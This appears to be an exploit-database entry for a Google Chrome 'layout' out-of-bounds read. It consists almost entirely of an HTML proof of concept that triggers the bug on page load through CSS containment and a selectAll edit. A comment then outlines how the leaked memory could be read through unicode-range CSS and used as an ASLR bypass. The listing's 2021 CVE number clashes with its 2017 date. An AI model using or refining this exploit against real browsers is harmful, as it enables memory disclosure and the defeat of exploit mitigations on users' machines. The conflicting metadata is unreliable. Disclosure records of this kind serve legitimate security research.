CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-27896 | CWE-125 | Not disclosed | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Anonymous | High | Remote | 2017-02-23 |

Google Chrome 'layout' Out-of-Bounds Read

```html
<!-- PoC: -->
<style>
content { contain: size layout; }
</style>
<script>
function leak() {
  document.execCommand("selectAll");
  opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
<!--
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM
calls, however it's possible to obtain it using tricks like unicode-range CSS
descriptor (credits to Jann Horn for coming up with that approach) which is
likely sufficient to turn this into an ASLR bypass.
-->
```